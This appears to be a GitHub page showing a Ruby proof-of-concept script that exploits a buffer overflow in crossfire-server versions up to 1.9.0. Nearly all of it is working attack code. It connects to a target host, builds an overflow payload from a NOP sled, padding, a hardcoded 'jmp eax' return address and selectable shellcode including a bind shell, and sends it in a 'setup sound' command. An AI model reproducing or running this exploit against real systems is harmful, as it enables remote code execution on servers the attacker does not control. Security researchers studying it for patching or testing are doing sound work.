-
Notifications
You must be signed in to change notification settings - Fork 12
/
crossfire_setupsound_exploit.rb
executable file
·106 lines (90 loc) · 2.45 KB
/
crossfire_setupsound_exploit.rb
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
#!/usr/bin/env ruby
#
# == crossfire_setupsound_exploit.rb
#
# A PoC remote exploit against Crossfire game
#
# == Usage
#
# crossfire_setupsound_exploit.rb host:
#
# == Description
#
# Yet another buffer overflow exploit against
# crossfire-server Works for crossfire-server <= 1.9.0 SetUp()
#
# == Author
#
# Jerry Wozniak <jerry@pstree.org>
#
# == Version
#
# 0.1
#
# == Created
#
# 2013-10-15
#
require 'optparse'
require 'socket'
require_relative 'lib/l32shellcode'
class CrossfireClient
def initialize(host, port)
@host, @port = host, port
end
def connect(verbose=false)
@tcp = TCPSocket.new(@host, @port)
@banner = @tcp.gets
puts @banner if verbose
end
def command(command, verbose=false)
puts command if verbose
@tcp.write("#{command}\r\n")
response = @tcp.gets
puts response if verbose
end
end
class Payload
include L32shellcode
def initialize ( beforepad = "\x41"*4063,
#crossfire - 8071e4e jmp eax
ret = "\x4e\x1e\x07\x08",
nopsled = "\x90"*200,
afterpad = "\x42"*7)
$beforepad, $ret, $nopsled, $afterpad = beforepad, ret, nopsled, afterpad
end
def return(type, len=5000)
shellcode = eval "L32shellcode::#{type}"
return shellcode if type.upcase == 'PATTERN' or type.upcase == 'SIMPLE'
shellcode = $nopsled + shellcode + $beforepad + $ret + $afterpad
end
end
options = {}
options[:shellcode] = 'pattern'
op = OptionParser.new do |opt|
opt.banner = "Usage: #{File.basename($0)} [options] crossfire-host[:port]"
opt.separator("\nWhere available options:")
opt.on("-s", "--shellcode TYPE", "Shellcode to inject
Where TYPE can be:
simple
pattern
BIND") { |o| options[:shellcode] = o }
opt.on("-v", "--verbose", "Verbose output") { options[:verbose] = true }
opt.on("-h", "--help", "Show this help") { puts opt; exit 1 }
if ARGV.empty?
puts opt
exit 1
end
end
op.parse!
host, port = ARGV.pop.to_s.split(/:/)
port = 13327 if port.nil?
cf = CrossfireClient.new(host, port)
cf.connect(options[:verbose])
begin
puts '[*] Deliverying the payload...'
cf.command("\x11(setup sound " + Payload.new.return(options[:shellcode]) + "\x90\x00#", true)
rescue Exception => e
p e
puts '[!!] No response'
end